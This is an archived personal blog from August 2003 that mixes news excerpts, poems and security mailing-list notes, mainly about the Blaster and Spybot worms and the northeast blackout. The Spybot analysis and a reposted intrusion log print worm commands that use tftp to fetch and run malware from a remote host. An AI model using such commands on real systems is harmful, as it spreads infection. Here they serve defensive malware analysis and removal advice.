Please note: the viewport design is copied from Steve Den Beste's excellent blog, USS Clueless. Used with permission.

Saturday, August 16, 2003  

A Trick For Quick Comments And Footnotes

Steven Den Beste has an interesting HTML gadget he used today in an article about electric power:

There's a famous quote from H. L. Mencken to the effect that for any problem there's a solution which is straightforward, easy to understand, and useless. [DWL!]

Every now and then, you see [DNW!] If you move the cursor over the indicator, a tool tip appears with a little note -- a sort of on-line footnote. It's a cool effect. So I right-clicked and did a "View Source" and found that Steve was using the <ACRONYM> indicator, which I didn't know. So I opened up the HTML 4.0 Help file and found it in the index. The idea is to use it as an indicator/explaination for acronyms -- that is, abbreviations that make pronounceable words -- like NATO. It turns out there's also an <ABBR> abbreviation tag, [like this], except that the <ABBR> doesn't seem to work. (At least, it's not working when I try it with IE 6...)

Anyways, here's how this works. I've added a couple of attributes to the indicator (color and italics) so it stands out from the regular text. I suspect that changing the CSS to do the color and font change automatically would be better, but I haven't done that part yet, so here's the code with the color/font change hand coded:

<span style="color:#0000ff;"><EM><ACRONYM title="ToolTip Here! A footnote appears as a tooltip when you put the cursor on the note indicator">[ToolTip Here!]</acronym></EM></span>

And you get this: [ToolTip Here!]

posted by Gary Williams at 8:37 PM | link |

via and USDOJ

A Review of the FBI's Performance in Deterring, Detecting, and Investigating the Espionage Activities of Robert Philip Hanssen

August 14, 2003
Office of the Inspector General


I. Introduction

In this report, the Office of the Inspector General (OIG) of the Department of Justice (DOJ) examines the performance of the Federal Bureau of Investigation (FBI) in deterring, detecting, and investigating the espionage of Robert Philip Hanssen, a former FBI Supervisory Special Agent. Hanssen's espionage began in November 1979 - three years after he joined the FBI - and continued intermittently until his arrest in February 2001, just two months before his mandatory retirement date. In addition to its management responsibility to detect espionage among its employees, the FBI is the lead agency for detecting and investigating espionage committed in the United States.

Hanssen became an FBI agent in 1976. During his 25-year FBI career, he principally served in Soviet counterintelligence assignments in New York City and Washington, D.C. In the 1980s and 1990s, Hanssen held positions at FBI Headquarters and the State Department that gave him access to a broad range of highly sensitive counterintelligence and military information. On February 18, 2001, after a three-month investigation of Hanssen, he was arrested and charged with committing espionage on behalf of the KGB (Komitet Gosudarstvennoy Bezopasnosti, the intelligence service of the former Soviet Union) and its successors. On July 6, 2001, Hanssen pled guilty to espionage charges pursuant to a plea agreement in which he agreed to cooperate with the U.S. government and submit to debriefings. On May 10, 2002, Hanssen was sentenced to life imprisonment.

Hanssen's espionage spanned three separate time periods: 1979-81, 1985-91, and 1999-2001. Over more than 20 years, Hanssen compromised some of this nation's most important counterintelligence and military secrets, including the identities of dozens of human sources, at least three of whom were executed. Hanssen gave the KGB thousands of pages of highly classified documents and dozens of computer disks detailing U.S. strategies in the event of nuclear war, major developments in military weapons technologies, information on active espionage cases, and many other aspects of the U.S. Intelligence Community's Soviet counterintelligence program.

posted by Gary Williams at 11:10 AM | link |

via The New York Times (registration required)

Experts Asking Why Problems Spread So Far


The power collapse that stilled a large swath of North America Thursday apparently began with a failure in the Midwest that cascaded into Canada, and from there into New York, power industry officials said yesterday. They said they were trying to determine why it spread so far.

An enormous, instantaneous reversal of the power flow — huge amounts of electricity that had been moving east over the Great Lakes and was suddenly sucked back — overloaded one or more power lines, which quickly took themselves out of service.

In seconds, parallel lines were overloaded as well and shut themselves down, and then generating stations disconnected themselves. Ultimately, dozens of lines and about 100 power plants, with a staggering 61,800 megawatts of generation, had shut down — apparently before any human being could react. The series of major failures began about 4:08 p.m., and was over within roughly five minutes. The failures were triggered by a few seconds of tremendous instability in energy flows.

"This whole event was essentially a 9-second event, maybe 10," said Michehl R. Gent, president and chief executive of the North American Electric Reliability Council, describing how the problem started. His organization was founded after the 1965 blackout to establish rules and procedures to prevent repetitions.

Mr. Gent and other officials could offer no explanation for the failure of a series of systems that are supposed to isolate such problems, keeping a blackout in one region from dragging its neighbors into darkness, as happened Thursday. Some of those systems worked, notably in northern New Jersey and Pennsylvania, preventing the failure from spreading southward, and in Connecticut, protecting New England. But others clearly did not.

And so, as some government officials squabbled over what went wrong first, experts and energy officials were urgently trying to answer the more serious question of what, in effect, went wrong second — the inability of the system's computers and human operators over the next few minutes to isolate and limit the trouble.

"If we've designed the system for this not to happen, how did it happen?" Mr. Gent said. "I can't answer that question." He added, "I am embarrassed."

posted by Gary Williams at 8:55 AM | link |

Friday, August 15, 2003  

via whiskey river

Wean Yourself

Little by little, wean yourself.
This is the gist of what I have to say.

From an embryo, whose nourishment comes in the blood,
move to an infant drinking milk,
to a child on solid food,
to a searcher after wisdom,
to a hunter of more invisible game.

Think of how it is to have a conversation with an embryo.
You might say, "The world outside is vast and intricate.
There are wheatfields and mountain passes,
and orchards in bloom.

At night there are millions of galaxies, and in sunlight
the beauty of friends dancing at a wedding."

You ask the embryo why he, or she, stays cooped up
in the dark with eyes closed.

.................................Listen to the answer.

There is no "other world,"
I only know what I've experienced.
You must be hallucinating."

- Jalaluddin Rumi

posted by Gary Williams at 11:46 PM | link |

via William Gibson


Yesterday's blog, that is.

'But more than that, I think he was making quite a funny joke about 'close your eyes and think of England' (the advice allegedly given to Victorian women for enduring sex). I think maybe he'll be a little disconcerted to see all this analysis of what he dislikes (which may well be projection of what we dislike, at least in part), when the intention was probably to make a (wry) funny.'

Yep. Indeed, I was attempting a wry funny. In fact, I continued to attempt them all day, privately, having constructed the following blurbic boilerplate :

'[TITLE] is like watching [AUTHOR 1] worry the bloated corpse of [AUTHOR #2].' And some of them were *really* funny, or so I thought, but I'd never post them here, else someone assume I had it in for whomever I'd happened to plug into slots #2 and #3. (Filling #1 is at once the most challenging and rewarding, you'll find.)

posted by Gary Williams at 9:10 PM | link |

Thursday, August 14, 2003  

Weird -- We Just Got Back, And Now The Page Doesn't Load

Sometimes my page will just load the header, complain that there's an error (usually one of the JScript's won't load, like the comments script from Enetation in England, which hasn't loaded since the blaster worm babble started), and even though the rest of the page usually loads, sometimes it just won't appear on the page (but it's there in the source...). The fix is often just to add a new post and the text starts appearing...

So we'll try that.

Update: OK, then the lights blinked and the TV shut off (we were watching a baseball game...). It did that three or four times. Then I noticed I was having trouble getting DNS, so (as I always do, since it seems to fix the chronic DNS problems we get here) I cleaned the netcache and rebooted -- and the ISP said my user ID or password was invalid!

So I called the ISP, and nobody was I left a message and called back this morning (still couldn't get on the net). Talked to my buddy Aaron Luckette (he's the CEO and a great guy) and he said the lights blinked big-time in Corning. The power supply kept the servers up, but for some reason the server decided that anybody who was logged on was still on -- so it wouldn't let them back in! (And Aaron was gone to Binghamton to rescue his wife, who was stranded at the hospital where she works -- the hospitals in Binghamton were all on emergency power, which don't extend to the powered parking gates at the parking Aaron wasn't at the office when I called at 4:50...).

At least we weren't in NYC. And I did get a bunch of writing done on my book -- How To Webmaster An eZine. (Mostly some standardization issues -- I've added JScript inserts for the standard stuff on each page -- the logo, the copyright claim -- so it all comes from a single file so that when I fiddle with the page-logo, the way I did last night, too, I can update all the pages without having to change each page...duh...but it's a good tip that I'll add to the how to code chapter sometime soon...)

Oh, yeah, the comments came back so apparently England has beat the worm (or something).

I do wonder whether all the worm babble I'm seeing on had something to do with the power crash, though.

Anyway, once I got back on the net, the page came back. Now all I have to do is finish cleaning up the email...

Power outage map
Click for larger map
Further update: I just read the story in the email New York Times that I get, and it apparently turns out that the reason behind the blackout is greedy deregulation fiddle: when the New York power utility was deregulated, the power companies (monopolists) sold their power plants (deregulated) but they got to keep the transmission lines (still regulated). So nobody's building new transmission lines, and New York City is a major bottleneck. To the point where the excess power they need at peak times has to come from New York City and Long Island power stations, because there's not enough room in the transmission lines.

So that's what happened -- something went wrong at Niagara Falls (lightening strike) or in Pennsylvania (boggle at a nuke) and it tumbled through the transmission grid and knocked out at least 7 nukes (it turns out that nuke power plants depend on the network to run the station, so if the net goes down, the nukes switch to emergency internal power and shut down the plant! -- sort of like the UPS on your 'puter!) and a bunch of regular power plants (cause if they can't put the power on the grid, they auto-shutdown too, and it takes at least half an hour for standard power plants to come back up, cause they have to check the equipment and make sure it's ok before they turn it on...) and the shutdowns tumbled out to Michigan... Here's the story (registration required).

posted by Gary Williams at 2:59 PM | link |

via Washington Post

Cloning Yields Human-Rabbit Hybrid Embryo

By Rick Weiss
Washington Post Staff Writer
Thursday, August 14, 2003; Page A04

Scientists in China have, for the first time, used cloning techniques to create hybrid embryos that contain a mix of DNA from both humans and rabbits, according to a report in a scientific journal that has reignited the smoldering ethics debate over cloning research.

More than 100 of the hybrids, made by fusing human skin cells with rabbit eggs, were allowed to develop in laboratory dishes for several days before the scientists destroyed them to retrieve so-called embryonic stem cells from their interiors. Although scientists in Massachusetts had previously mixed human cells and cow eggs in a similar attempt to make hybrid embryos as a source of stem cells, those experiments were not successful.

Researchers said yesterday they were hopeful that the rabbit work would lead to a new and plentiful source of embryonic stem cells for research and, eventually, for medical use. But theologians and others decried the work as unethical.

Some wondered aloud what, exactly, such a creature would be if it were transferred to a womb to develop to term.

The vast majority of the DNA in the embryos is human, with a small percentage of genetic material -- called mitochondrial DNA -- contributed by the rabbit egg. No one knows if such an embryo could develop into a viable fetus, though some experiments with other species suggest it would not.

posted by Gary Williams at 11:28 AM | link |

via whiskey river

"The body is the tree of enlightenment,
The mind like a clear mirror stand;
Time and again wipe it diligently,
Don't let it gather dust."
- Shenxiu

"Enlightenment is basically not a tree,
And the clear mirror is not a stand.
Fundamentally there is not a single thing -
Where can dust collect?"
- Huineng

posted by Gary Williams at 1:30 AM | link |

via William Gibson


'Imagine Tom Clancy mated with William Gibson, with James Michener acting as a midwife, and you begin to get the idea.'


posted by Gary Williams at 12:00 AM | link |

Wednesday, August 13, 2003  


New Version Of The Blaster Worm Reported

Date: Wednesday, August 13, 2003 4:11:53 PM
Subject: A new version on the loose...

If you haven't already heard......


Here's the core quote from Kaspersky:

Technologically, the new modification of "Lovesan" is a copycat of the original. Slight changes were made only to the appearance of the worm: a new name of the main worm-carrier file (TEEKIDS.EXE instead of MSBLAST.EXE), a different method of code compression (FSG instead of UPX), and new "copyright" strings in the body of the worm abusing Microsoft and anti-virus developers.

posted by Gary Williams at 4:32 PM | link |

The Viral Blog Interview Continues

I was expecting the viral interviews to stop here. I didn't expect anybody to sign up. But, thanks to meg and the gang at Mandarin Design (who've been over a visit a lot in the last couple of days), Mark from took the plunge and signed up for the interview.

Just so you remember, here's the rules:
1) If you want to participate, leave a comment saying "interview me."
2) I will respond by asking you five questions (not the same as you see here).
3) You will update your blog/site with the answers to the questions.
4) You will include this explanation and an offer to interview someone else in the same post.
5) When others comment asking to be interviewed, you will ask them five questions.

So, here are the questions for Mark:

1) Where do you live, why do you live there and where to you want to live?

2) Have you written any books? (which ones?) What book are you working on now? (Or, if you're not working on one, what would you like to be working on?)

3) What are the best and worse features of your blog?

4) What three blogs would you pick to read every day if you could only read three?

5) If you could solve any problem you wanted to, what problem would you solve?

So, give Mark a day or two and head on over to

posted by Gary Williams at 2:44 PM | link |

EFF and Stanford law center launch

From Declan McCullagh's Politech

Date: Wednesday, August 13, 2003 4:17:19 AM
Subject: FC: EFF and Stanford law center launch

---------- Forwarded message ----------
Date: Tue, 12 Aug 2003 15:18:37 -0700 (PDT)
From: Joseph Lorenzo Hall <jhall@astron.Berkeley.EDU>
To: Dave Farber <>, Declan McCullagh <>
Subject: EFF, Stanford CIS launch

EFF, Stanford CIS launch

Not only is the RIAA planning thousands of lawsuits against individuals... Direct TV has already initiated approximately 9000 (that's no typo!) federal lawsuits against individuals.

These individuals did not necessarily do anything illegal... most of them merely bought a piece of technology called a smart card programmer. Direct TV claims that the only use for such tech. is to steal satellite broadcasting... however, readers of Politech and IP
know that they can be used for, at least, one other thing: loading them up with bogus votes and using them in Diebold voting machines!

The EFF and Stanford's Center for Internet and Society have launched a website ( ) that aims to aid individuals that have been threatened by Direct TV with lawsuits or
just plain sued. Among the resources provided is a huge list of attorneys that have dealt with Direct TV cases, many at reduced/aggregate rates.


Joseph Lorenzo Hall
Graduate Student

POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech:
This message is archived at
Like Politech? Make a donation here:
Declan McCullagh's photographs are at

posted by Gary Williams at 11:44 AM | link |

via Drug discovery - biotech, pharmaceuticals, research, clinical trials, etc. In the pipeline - Corante
I'll leave by quoting part of a poem that I wrote one day in grad school, having stuffed my brain with the chiral aspects of optical spectroscopy. What came out was a version of a Lewis Carroll poem which was itself a parody of Wordsworth:

. . .And if now I chance to put
My tongue in super glue
Or madly cram my chiral foot
In its enantiomeric shoe,
I weep, for it reminds me so
Of that old class I used to know,
Of ligand fields and planar nodes
And symmetries of normal modes.

Oh yeah. I should post the whole thing. Hang around here long enough and I'll eventually haul out my molecular-orbital-theory version of 'The Raven.' Wouldn't want to miss out on that, would you? Corante's traffic is just going to explode. . .

posted by Gary Williams at 2:02 AM | link |

via abuddhas memes
Man is the only animal that blushes - or needs to. - Mark Twain

Questions dog me today (yes, Aurora, walkies soon!). The first to irritate my craw is why, given the advanced state of EMP weapons development, the UKUSA forces did not spare countless lives and employ them? The only answer I can come up with is that mass casualties are in some twisted way expedient to the occupying forces. There is nothing secret about these non-lethal weapons - I could create my own in an afternoon from readily available components a la Radio Shack.

Another fatal mistake is that the bevy of other non-lethal technologies ubiquitously available to (and abused by) our domestic law enforcement personnel have not been supplied to the military forces occupying Iraq. Why not?

posted by Gary Williams at 1:55 AM | link |

via whiskey river

"I see now that my turbulent mind needs activity, that it must break out and try a hundred different ways before reaching the goal towards which I am always straining. There is an old leaven working in me, some black depth that must be appeased. Unless I am writhing like a serpent in the coils of a pythoness I am cold. I must recognize this and accept it, and to do so is the greatest happiness. Everything good that I have ever done has come about in this way."
- Eugene Delacroix

posted by Gary Williams at 1:34 AM | link |

via William Gibson


Visiting San Francisco shortly before I began writing ALL TOMORROW'S PARTIES, I had the experience, in Market Street, that the novel's Taoist assassin has:

"Drowned down three decades, she steps fresh as creation from the bronze doors of some brokerage. And he remembers, in that instant, that she is dead, and he is not, and that this is another century, and this quite clearly another girl, some newly minted stranger, one with whom he will never speak."

The woman I momentarily mistook a much younger woman for is neither dead nor a former lover, but the experience, I immediately understood, never before having had it, is one that you can't have until middle age.

At this point I had neither the character of the assassin nor a narrative in which to find him.

But soon, still in San Francisco, I happened to be introduced to an FBI sniper.

He was a small man, much smaller than FBI agents were allowed to be in Hoover's day. In the right clothing, he might have passed for a young teen, and I wondered how useful that might be, in certain situations.

He explained that he was required to constantly re-qualify, to an extremely high level of proficiency, with a variety of firearms.

He mentioned "cold shots", the first shot out of the barrel of a rifle, and how these differ from subsequent shots, when the barrel has warmed up, and how a sniper has to train to cope with that, as his first shot should also be his last.

But what most struck me about him was his serenity.

Alert, relaxed. Present.

There was nothing that would suggest anything about my Taoist. Nothing but that sense of some inner transparent stillness.

And then somehow the ">" of imagination, connecting the two experiences.

posted by Gary Williams at 12:24 AM | link |

Tuesday, August 12, 2003  

Notes On DCOM Exploits From Stanford

From: Tina Bird
Date: Tuesday, August 12, 2003 7:00:14 PM
Subject: Notes on DCOM exploits

Hi all --

Stanford's been hit with at least four distinct exploits based on the
Microsoft DCOM/RPC vulnerability. At least one of the attacks does not
seem to have made it into any of the anti-virus vendors' databases yet
(we're working on that) -- this one disables Norton Anti-Virus and very
politely installs the MS03-026 patch once it's compromised a victim

Everything we knew up until Friday evening is currently on line at

Most importantly, this page includes ways to tell which of the exploits
has hit a given machine. I'm going to add information on Blaster this

Note that there is no one cleaning tool that successfully removes all
signs of the infection -- no tool available yet at all that works on what
we're referring to as the "33571 worm" -- and that you can only remove an
infection >after< it's been correctly identified.

Please contact me with questions, corrections, etc.

Joy joy joy -- tbird

A computer lets you make more mistakes faster than any invention in human
history - with the possible exception of handguns and tequila.

-- Mitch Ratliff
Log Analysis
tbird's Security Alerts

Note: for the patch from MicroSoft, go here: If you're sure you had the MSBLASTER worm, Symantec has a removal tool (got the link from Slashdot) here:

posted by Gary Williams at 7:43 PM | link |

via Slashdot link

DMCAbots Are Idiots

Date: Mon, 11 Aug 2003 12:37:14 -0700 (PDT)
From: Ryan Finnie
Subject: [gentoo-mirrors] Notice of Claimed Infringement (fwd)


Redundant Networks ( / currently is in the official rsync pool, and we are waiting on becoming an official dist mirror. Nonetheless, I currently have a copy of the gentoo distribution available via http and ftp. Earlier today we received this by way of AT&T (since our gentoo mirror is on an IP block allocated from them).

The short of it is, their DMCAbot(TM) found /distfiles/, picked out the words 'Pac' and 'Man', and is now threatening us under the DMCA for distributing a pirated version of Pacman. While I'm not too worried about this (in fact, I'm rather amused), I'm just wondering if any other dist mirrors have received any threats similar to this.


posted by Gary Williams at 2:38 PM | link |

MSBLAST Infections Per Hour

MSBLAST Infections


From: George Bakos
Date: Tuesday, August 12, 2003 1:53:26 PM
Subject: Re: [LOGS] Summary of large-scale portscanning detects


I've put up a graph of new msblast sources per hour. This is updated
approx. every 10 minutes:

If anyone wants to send me their firewall/IDS logs, sanitized is fine, particularly TCP port 135/4444 activity, I'll gladly integrate them here. All I ask for is date/time, src ip, dst port & protocol, beginning at 12:00 EDT (16:00 GMT) 11 Aug.

mo' data mo' data mo' data.

On Mon, 11 Aug 2003 07:26:53 -0500 (CDT) wrote:

> The following extracts show the beginning and ending of scan activity
> was detected on my network. The number following each set is the total
> number of probes for that source. Timestamps are GMT-0500.
> Aug 10 18:27:57 -> xxx.yyy.0.2:445 SYN ******S*
> Aug 10 18:27:57 -> xxx.yyy.0.3:445 SYN ******S*

George Bakos
Institute for Security Technology Studies - IRIA
Dartmouth College
603.646.0665 -voice
603.646.0666 -fax

posted by Gary Williams at 2:26 PM | link |

via Sinfest

Cartoon Of The Day


posted by Gary Williams at 12:12 PM | link |

Monday, August 11, 2003  


Spybot DDoS zombie using dll injection and RPC/DCOM exploit

From: Joe Stewart
Date: Monday, August 11, 2003 12:45:37 PM
Subject: Spybot DDoS zombie using dll injection and RPC/DCOM exploit

A new variant of the Spybot IRC DDoS zombie which can spread via the RPC/DCOM exploit has been discovered attempting to infect honeypots we are monitoring. It includes the exploit code, a tftp server, a dll injector and the IRC control component all in one self-contained package of 24064 bytes (UPX packed).

The trojan infects a system using the RPC/DCOM exploit shellcode from the HD Moore exploit. It obtains a remote shell on port 4444 and runs the following commands:

C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
C:\WINNT\system32>start winlogin.exe

x.x.x.x is the IP address of the zombie host which is making the connection. Note that there is a bug in the code which makes the bot sometimes get its own IP address as In these cases the trojan will be unable to infect other systems.

winlogin.exe is a DLL injector. Note the similarity in the name to the Windows system file winlogon.exe - make sure not to confuse the two, as removing or damaging winlogon.exe will make Windows unable to start. The presence of winlogin.exe may not necessarily indicate an infection; other software may use this name (although it is questionable). A true indicator of infection is registry keys referencing winlogin.exe in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which reappear immediately after being deleted.

When winlogin.exe successfully starts on an infected system, it will extract a DLL file to %windir%\system32 and inject it into the running explorer.exe process. This dll has been known to use the name yuetyutr.dll but may be renamed in future variants. The injector rocess will then exit, but the injected DLL remains in memory. Since it runs in the process space of explorer.exe, it will likely be undetected by personal firewalls.

The trojan removes the tftp.exe file so that the host system cannot be re-infected using the same method. When this file is deleted, you may get a message box popup that reads:

"Files that are required for Windows to run properly have been replaced by unrecognized versions. To maintain system stability, Windows must restore the original versions of these files."

Removal instructions:
This trojan runs as long as the main explorer.exe process is running, so it is impossible to simply kill the process. It constantly maintains its registry entries and will also recreate the injector file if it is removed. It is even capable of running in safe mode, so removal is difficult. However, by corrupting the injector file, we can make it impossible for the trojan to inject itself on the next boot, allowing us to remove the associated registry keys and files.

WARNING: This is an advanced procedure. Do not attempt this if you are unsure of what you are doing. Entering the wrong command here could render your computer unusable! Presence of the winlogin.exe file does not necessarily indicate an infection. If you do not also find the yuetyutr.dll file on your system, or you do not see registry keys which re-insert themselves when removed, you are advised against attempting this procedure.

Open a command prompt and enter the following commands:
cd %windir%\system32
echo 'go away' > winlogin.exe

This will corrupt the winlogin.exe file so it can no longer be run.

Reboot the computer, run regedit and remove the registry entries in HKLM\Software\Microsoft\Windows\CurrentVersion\Run associated with winlogin.exe

Remove %windir\system32\winlogin.exe and %windir\system32\yuetyutr.dll


Joe Stewart, GCIH
Senior Intrusion Analyst
LURHQ Corporation

Update: Others Seeing The Worm, Too

From: Pedro Paulo Ferreira Bueno
Date: Monday, August 11, 2003 3:12:54 PM
To: 'Mike Sallman';
Subject: RES: Spybot DDoS zombie using dll injection and RPC/DCOM exploit

Additional info about msblast.exe at

Pedro Bueno

-----Mensagem original-----
De: Mike Sallman []
Enviada em: segunda-feira, 11 de agosto de 2003 15:36
Para: 'Joe Stewart';
Assunto: RE: Spybot DDoS zombie using dll injection and RPC/DCOM exploit

Just saw this on ours:

[**] TCP Intrusion/Reconnaissance attempt [**]
08/11-12:50:15.565588 0:6:28:F9:DC:A0 -> 0:0:F:FF:FF:FF type:0x800 len:0x5E -> aaa.bbb.ccc.ddd:4444 TCP TTL:122 TOS:0x0 ID:1638
IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x91424341 Ack: 0x54FCB639 Win: 0xFB40 TcpLen: 20
74 66 74 70 20 2D 69 20 32 30 38 2E 32 35 32 2E tftp -i 208.252.
31 36 37 2E 32 30 32 20 47 45 54 20 6D 73 62 6C 167.202 GET msbl
61 73 74 2E 65 78 65 0A ast.exe.


Google didn't turn up anything for msblast.exe


Further Update:

From: Corey Merchant
Date: Monday, August 11, 2003 3:40:30 PM
Subject: Windows RPC/DCOM - MSBlast Worm

Here's more on the new Windows RPC/DCOM worm.

This one seems pretty simple so far. It does most of what you may have seen
- exploits via port 135/RPC.
- downloads binary (msblast.exe) via tftp.
- adds a registry key to re-start after reboot

- On the 16th, syn-floods (with spoofed sources)

Corey Merchant
LURHQ Corporation

Further Further Update: Initial Summary Available

Date: Monday, August 11, 2003 3:59:54 PM
Subject: rpc dcom worm "BILLY"

just a quick pointer that we posted a first analysis at

SANS - Internet Storm Center
PGP Key:

posted by Gary Williams at 1:05 PM | link |

via Happy Furry Puppy Time with Norbizness


As a condition of being interviewed, I must now become an interviewer of another blogger out there. If you agree to be interviewed (by leaving a comment to this post), you must also agree to the following conditions, or I will be hunted down by the people who started this thing and slapped silly:

1) If you want to participate, leave a comment saying "interview me."
2) I will respond by asking you five questions (not the same as you see here).
3) You will update your blog/site with the answers to the questions.
4) You will include this explanation and an offer to interview someone else in the same post.
5) When others comment asking to be interviewed, you will ask them five questions.

I'm only going to come up with a single set of five questions. As many commenters within the next 24 hours can participate in feeding this exponentially growing viral interviewitis.

Here's Norbizness's Questions (And My Answers)


We have four weblogger participants for the five questions. Each of the following people will post responses to the following questions on their own weblog (Kriselda of Different Strings, Seb of Sadly, No!, Gary of the TFS Reluctant, and our Aussie homeboy Jon of G'Day Mate.) I think these are the four, but I'm doing it from memory, because the comments are broken right now. Remember the ground rules, posted below.

(1) If you could have dinner with four contemporary public figures, where everybody's entree (except for yours) was heavily flavored with strychnine, who would the guests be and why?
I don't like this question a bit, but since I agreed to answer whatever stupid questions asked, I'd pick Bush, Chaney, Ashcroft and Rowe, since they seem determined to destroy the United States and I'm tired of not having a job and without 'em I expect the economy would pick up.
(2) If you could learn a musical instrument that you don't currently know, what would it be and who would be your ideal instructor?
I play guitar, keyboards, trumpet and skin drums already, so I suppose it would have to be saxophone or cello. I'd pick my friend Denise for an instructor, since she's a great fiddle player and she's beautiful besides. I don't know any sax players. And I'd like to see her again.
(3) Old Uncle Giblet up and died and left you $3 million tax free bucks, which can only be spent on a piece of property (land, house, business). What do you spend it on?
I'd buy a bed and breakfast on a lake in north California and set up a computer programming camp.
(4) What's the one thing you think you offer on your weblog that zillions of other weblogs don't? Really?
As Norbizness notes, if you scroll down TFS Reluctant really fast, it puts you into convulsions. And I think I pick a good selection of interesting nonsense and informative stories, not to mention poetry, spiritual quotes and utter drivel.
(5) If you were limited to only reading three weblogs a day, who would they be and why? Please don't mention me, unless it's some sort of pity-based "honorable mention".
Because Michelle Goodwool is my friend, and I learn web programming stuff from her:
Because I like the poetry and spiritual quotes:
And because I like the news stories and goofy stuff (not to mention the Boobies links):
Sorry I couldn't make it more person-specific, but hey, there's four of you and I'm lazy. Now spread the disease! 

Now I guess I'm committed to asking five questions to whoever volunteers by leaving a comment -- same rules, so if you want to spread the virus...sign up and I'll send you your questions in tomorrow's email...

posted by Gary Williams at 12:17 PM | link |

Anybody else seeing this blogger error?

When I post, I get this message (started yesterday, continued today):

550 Could not open: No space left on device on file:archives/2003_08_10_tfs_reluctant_archive.html

Could blogger be running out of disk space? Or do you think they've put file size limits on non-Pro Blogger customers?

Any advice? Or is this just a new manifestation of the continuing saga of blogger archive problems?

Update: The error disappeared around 1 p.m. (EST). Think they got a bigger disk? Hope so...

posted by Gary Williams at 9:18 AM | link |

via The New York Times (registration required)

Internet Providers Question Subpoenas to Stop File Swapping


Arguing that the record industry is trying to force its members to become the "police of the Internet," a group representing over 100 Internet service providers plans to deliver a letter to the industry's trade association today. The letter asks a series of pointed questions about plans to sue people suspected of illegally trading music files online.

The letter from NetCoalition is the latest objection from Internet service providers to a flood of subpoenas from the record industry seeking the identities of Internet subscribers suspected of swapping files.

"There are understandable fears among many in the Internet community that the real purpose of this legal campaign is to achieve in court what the association has not yet been able to accomplish in Congress — to make Internet companies legally responsible for the conduct of individuals who use their systems," the NetCoalition letter says.

The group includes the Internet service provider associations of Virginia, Washington and Wyoming, as well as several companies, including in New York.

Record industry officials said they could not comment on the specifics of the letter because they had not yet received it.

But Matt Oppenheim, a lawyer for the record industry group, said Internet providers were protesting the subpoenas because file-swapping attracts customers, now accounting for more than half of the traffic over broadband cable networks. "We're not asking them to police the Internet," Mr. Oppenheim said. "We're asking them to comply with the law. If they were policing we wouldn't have this problem."

A 1998 copyright law sought to limit the liability of Internet providers over how subscribers use their resources, while making it easier for copyright holders to pursue online infringers. The law allows copyright holders to obtain subpoenas from court clerks, without first filing a lawsuit or going before a judge, compelling Internet providers to release subscriber contact information.

The record industry has taken advantage of that in recent weeks as it seeks to crack down on Internet piracy. Verizon and SBC Communications, two major Internet providers, have argued in court filings that the subpoena provision is unconstitutional because it violates the due process rights of its subscribers.

The NetCoalition letter instead focuses on the details of how the record industry is carrying out its goal of filing thousands of subpoenas in the coming months. It asks for a meeting to discuss how the industry trade group ensures the accuracy of the subpoenas, how it decides whom to target, and it raises concerns over the cost of compliance.

"There has to be a better answer than litigation," the letter says.

On Friday, a federal judge granted a request by the Massachusetts Institute of Technology and Boston College not to comply with the subpoenas they had received because the record industry group had filed them in a Washington court.

posted by Gary Williams at 9:11 AM | link |

Sunday, August 10, 2003  

FBI lobbies for new wiretap rules targeting cable, DSL providers

From Declan McCullagh's Politech

Date: Sunday, August 10, 2003 10:59:47 PM
Subject: FC: FBI lobbies for new wiretap rules targeting cable, DSL providers

FBI targets Net phoning
By Declan McCullagh
July 29, 2003, 4:00 AM PT

Internet telephone calls are fast becoming a national security threat that must be countered with new police wiretap rules, according to an FBI proposal presented quietly to regulators this month.

Representatives of the FBI's Electronic Surveillance Technology Section in Chantilly, Va., have met at least twice in the past three weeks with senior officials of the Federal Communications Commission to lobby for proposed new Internet eavesdropping rules. The
FBI-drafted plan seeks to force broadband providers to provide more efficient, standardized surveillance facilities and could substantially change the way that cable modem and DSL (digitalsubscriber line) companies operate.

The new rules are necessary because terrorists could otherwise frustrate legitimate wiretaps by placing phone calls over the Internet, warns a summary of a July 10 meeting with the FCC that the FBI prepared. "Broadband networks may ultimately replace narrowband
networks," the summary says. "This trend offers increasing opportunities for terrorists, spies and criminals to evade lawfulelectronic surveillance."


POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech:
This message is archived at
Like Politech? Make a donation here:
Declan McCullagh's photographs are at

posted by Gary Williams at 11:24 PM | link |

Click for
482K image



Credit & Copyright: Antonio Cidadao

Click for
463K image

Explanation: Our Moon's appearance changes nightly. This time-lapse sequence shows what our Moon looks like during a lunation, a complete lunar cycle. As the Moon orbits the LunationEarth, the half illuminated by the Sun first becomes increasingly visible, then decreasingly visible. The Moon always keeps the same face toward the Earth.Lunation The Moon's apparent size changes slightly, though, and a slight wobble called a libration is discernable as it progresses along its elliptical orbit.Lunation During the cycle, sunlight reflects from the Moon at different angles, and so illuminates different features differently.Lunation A full lunation takes about 29.5 days, just under a month (moon-th).

posted by Gary Williams at 3:01 PM | link |

Role of Politech in the Apple iTunes issue, from New York Times

From Declan McCullagh's Politech

Date: Sunday, August 10, 2003 12:08:24 PM
Subject: FC: Role of Politech in the Apple iTunes issue, from New York Times

Previous Politech message:


Border-crossing trouble for downloaded tunes
By Bob Tedeschi NYT
Tuesday, July 29, 2003

Online music-selling services have far fewer restrictions than the industry's early offerings, but they do not necessarily travel well.

That became evident last week after an Apple iTunes customer posted a complaint on the Web log of Declan McCullagh, who covers technology for CNet's, and the discussion list of David Farber, a business and technology professor at the University of Pennsylvania.

The posting, from Shawn Yeager, a technology consultant in Toronto, related his problems gaining access to songs he had downloaded from the iTunes online music store before he moved to Canada from the United States. In an interview, Yeager said that after complaining to Apple, he received automated e-mail responses implying that international licensing rights were to blame for his troubles.

An Apple spokeswoman, Lara Vacante, said that Yeager's disappearing music files were not the result of Apple's policies but a systems error, though she and Yeager disagreed about where the error occurred.

"Once you download a song, it's yours," Vacante said.

But she said a consumer who did not have a credit card with a U.S. billing address could not download iTunes, because Apple has rights to sell the more than 200,000 songs in its database only in the United States.

Yeager said that the problem had been resolved to his satisfaction but that "this points to some core problems" with how online companies restrict the use of the music they sell.

His posting Friday resulted in much discussion in online news groups and inquiries to other online music services about their international sales policies.


POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech:
This message is archived at
